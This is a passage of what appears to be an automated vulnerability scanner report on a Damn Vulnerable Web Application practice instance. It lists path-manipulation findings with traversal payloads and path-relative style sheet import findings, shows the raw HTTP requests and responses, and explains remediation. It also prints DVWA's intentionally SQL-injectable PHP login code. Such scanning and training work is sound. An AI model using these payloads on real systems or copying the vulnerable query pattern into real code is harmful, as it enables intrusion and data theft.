</span><span style="color: #007700">echo </span><span style="color: #DD0000">"<p>Welcome to the password protected area </span><span style="color: #007700">{</span><span style="color: #0000BB">$user</span><span style="color: #007700">}</span><span style="color: #DD0000"></p>"</span><span style="color: #007700">;
echo </span><span style="color: #DD0000">"<img src=\"</span><span style="color: #007700">{</span><span style="color: #0000BB">$avatar</span><span style="color: #007700">}</span><span style="color: #DD0000">\" />"</span><span style="color: #007700">;
}
else {
</span><span style="color: #FF8000">// Login failed
</span><span style="color: #007700">echo </span><span style="color: #DD0000">"<pre><br />Username and/or password incorrect.</pre>"</span><span style="color: #007700">;
}
((</span><span style="color: #0000BB">is_null</span><span style="color: #007700">(</span><span style="color: #0000BB">$___mysqli_res </span><span style="color: #007700">= </span><span style="color: #0000BB">mysqli_close</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"___mysqli_ston"</span><span style="color: #007700">]))) ? </span><span style="color: #0000BB">false </span><span style="color: #007700">: </span><span style="color: #0000BB">$___mysqli_res</span><span style="color: #007700">);
}
</span><span style="color: #0000BB">?>
</span></code>
...[SNIP]...
Request 2
GET /vulnerabilities/view_source.php?id=...%2fbrute&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:53 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 956
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
18.3. https://pentest-ground.com:4280/vulnerabilities/view_source.php [security parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Issue detail
The security parameter appears to be vulnerable to file path manipulation attacks.
The payload ./ide/../low was submitted in the security parameter. This returned the same content as the base request. The payload .../low was then submitted, and this returned a different response. This indicates that the application may be vulnerable to file path manipulation.
Request 1
GET /vulnerabilities/view_source.php?id=brute&security=.%2fide%2f..%2flow HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:51:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 6540
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
<code style="color: #000000"><span style="color: #0000BB"><?php
</span><span style="color: #007700">if( isset( </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[ </span><span style="color: #DD0000">'Login' </span><span style="color: #007700">] ) ) {
</span><span style="color: #FF8000">// Get username
</span><span style="color: #0000BB">$user </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[ </span><span style="color: #DD0000">'username' </span><span style="color: #007700">];
</span><span style="color: #FF8000">// Get password
</span><span style="color: #0000BB">$pass </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[ </span><span style="color: #DD0000">'password' </span><span style="color: #007700">];
</span><span style="color: #0000BB">$pass </span><span style="color: #007700">= </span><span style="color: #0000BB">md5</span><span style="color: #007700">( </span><span style="color: #0000BB">$pass </span><span style="color: #007700">);
</span><span style="color: #FF8000">// Check the database
</span><span style="color: #0000BB">$query </span><span style="color: #007700">= </span><span style="color: #DD0000">"SELECT * FROM `users` WHERE user = '</span><span style="color: #0000BB">$user</span><span style="color: #DD0000">' AND password = '</span><span style="color: #0000BB">$pass</span><span style="color: #DD0000">';"</span><span style="color: #007700">;
</span><span style="color: #0000BB">$result </span><span style="color: #007700">= </span><span style="color: #0000BB">mysqli_query</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"___mysqli_ston"</span><span style="color: #007700">], </span><span style="color: #0000BB">$query </span><span style="color: #007700">) or die( </span><span style="color: #DD0000">'<pre>' </span><span style="color: #007700">. ((</span><span style="color: #0000BB">is_object</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"___mysqli_ston"</span><span style="color: #007700">])) ? </span><span style="color: #0000BB">mysqli_error</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"___mysqli_ston"</span><span style="color: #007700">]) : ((</span><span style="color: #0000BB">$___mysqli_res </span><span style="color: #007700">= </span><span style="color: #0000BB">mysqli_connect_error</span><span style="color: #007700">()) ? </span><span style="color: #0000BB">$___mysqli_res </span><span style="color: #007700">: </span><span style="color: #0000BB">false</span><span style="color: #007700">)) . </span><span style="color: #DD0000">'</pre>' </span><span style="color: #007700">);
if( </span><span style="color: #0000BB">$result </span><span style="color: #007700">&& </span><span style="color: #0000BB">mysqli_num_rows</span><span style="color: #007700">( </span><span style="color: #0000BB">$result </span><span style="color: #007700">) == </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {
</span><span style="color: #FF8000">// Get users details
</span><span style="color: #0000BB">$row </span><span style="color: #007700">= </span><span style="color: #0000BB">mysqli_fetch_assoc</span><span style="color: #007700">( </span><span style="color: #0000BB">$result </span><span style="color: #007700">);
</span><span style="color: #0000BB">$avatar </span><span style="color: #007700">= </span><span style="color: #0000BB">$row</span><span style="color: #007700">[</span><span style="color: #DD0000">"avatar"</span><span style="color: #007700">];
</span><span style="color: #FF8000">// Login successful
</span><span style="color: #007700">echo </span><span style="color: #DD0000">"<p>Welcome to the password protected area </span><span style="color: #007700">{</span><span style="color: #0000BB">$user</span><span style="color: #007700">}</span><span style="color: #DD0000"></p>"</span><span style="color: #007700">;
echo </span><span style="color: #DD0000">"<img src=\"</span><span style="color: #007700">{</span><span style="color: #0000BB">$avatar</span><span style="color: #007700">}</span><span style="color: #DD0000">\" />"</span><span style="color: #007700">;
}
else {
</span><span style="color: #FF8000">// Login failed
</span><span style="color: #007700">echo </span><span style="color: #DD0000">"<pre><br />Username and/or password incorrect.</pre>"</span><span style="color: #007700">;
}
((</span><span style="color: #0000BB">is_null</span><span style="color: #007700">(</span><span style="color: #0000BB">$___mysqli_res </span><span style="color: #007700">= </span><span style="color: #0000BB">mysqli_close</span><span style="color: #007700">(</span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"___mysqli_ston"</span><span style="color: #007700">]))) ? </span><span style="color: #0000BB">false </span><span style="color: #007700">: </span><span style="color: #0000BB">$___mysqli_res</span><span style="color: #007700">);
}
</span><span style="color: #0000BB">?>
</span></code>
...[SNIP]...
Request 2
GET /vulnerabilities/view_source.php?id=brute&security=...%2flow HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:50:56 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 942
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
19. Path-relative style sheet import
Previous
Next
There are 25 instances of this issue:
Issue background
Path-relative style sheet import vulnerabilities arise when the following conditions hold:
- A response contains a style sheet import that uses a path-relative URL (for example, the page at "/original-path/file.php" might import "styles/main.css").
- When handling requests, the application or platform tolerates superfluous path-like data following the original filename in the URL (for example, "/original-path/file.php/extra-junk/"). When superfluous data is added to the original URL, the application's response still contains a path-relative stylesheet import.
- The response in condition 2 can be made to render in a browser's quirks mode, either because it has a missing or old doctype directive, or because it allows itself to be framed by a page under an attacker's control.
- When a browser requests the style sheet that is imported in the response from the modified URL (using the URL "/original-path/file.php/extra-junk/styles/main.css"), the application returns something other than the CSS response that was supposed to be imported. Given the behavior described in condition 2, this will typically be the same response that was originally returned in condition 1.
- An attacker has a means of manipulating some text within the response in condition 4, for example because the application stores and displays some past input, or echoes some text within the current URL.
Given the above conditions, an attacker can execute CSS injection within the browser of the target user. The attacker can construct a URL that causes the victim's browser to import as CSS a different URL than normal, containing text that the attacker can manipulate.
Being able to inject arbitrary CSS into the victim's browser may enable various attacks, including:
- Executing arbitrary JavaScript using IE's expression() function.
- Using CSS selectors to read parts of the HTML source, which may include sensitive data such as anti-CSRF tokens.
- Capturing any sensitive data within the URL query string by making a further style sheet import to a URL on the attacker's domain, and monitoring the incoming Referer header.
Issue remediation
The root cause of the vulnerability can be resolved by not using path-relative URLs in style sheet imports. Aside from this, attacks can also be prevented by implementing all of the following defensive measures:
- Setting the HTTP response header "X-Frame-Options: deny" in all responses. One method that an attacker can use to make a page render in quirks mode is to frame it within their own page that is rendered in quirks mode. Setting this header prevents the page from being framed.
- Setting a modern doctype (e.g. "<!doctype html>") in all HTML responses. This prevents the page from being rendered in quirks mode (unless it is being framed, as described above).
- Setting the HTTP response header "X-Content-Type-Options: nosniff" in all responses. This prevents the browser from processing a non-CSS response as CSS, even if another page loads the response via a style sheet import.
References
Vulnerability classifications
19.1. https://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5930
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=73d6358342b7f8225c6c9245a1862de5; expires=Tue, 22 Oct 2024 09:54:21 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 2
GET /index.php/hbd3ac/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5930
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=37bde0877ebf06d4500e3d7657e6b5f0; expires=Tue, 22 Oct 2024 09:54:32 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 3
GET /index.php/hbd3ac/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:32 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5930
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=db688905c6865563c6023938bd6a25b6; expires=Tue, 22 Oct 2024 09:54:32 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="
...[SNIP]...
19.2. https://pentest-ground.com:4280/about.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/about.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /about.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3993fff83b578282d961fdbea2806ea
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:03 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5198
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>About :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 2
GET /about.php/ucnx2h/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3993fff83b578282d961fdbea2806ea
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:04 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5198
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>About :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 3
GET /about.php/ucnx2h/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3993fff83b578282d961fdbea2806ea
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5198
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>About :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
19.3. https://pentest-ground.com:4280/instructions.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/instructions.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /instructions.php?doc=PDF HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=45429c39c8bc47c9d2826733e0787cb2
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:18 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3169
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Instructions :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 2
GET /instructions.php/u3gvko/?doc=PDF HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=45429c39c8bc47c9d2826733e0787cb2
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:48:55 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3169
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Instructions :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 3
GET /instructions.php/u3gvko/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=45429c39c8bc47c9d2826733e0787cb2
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:48:55 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 32379
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Instructions :: Damn Vulnerable Web Application (DVWA)</title>
<link
...[SNIP]...
19.4. https://pentest-ground.com:4280/login.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/login.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /login.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
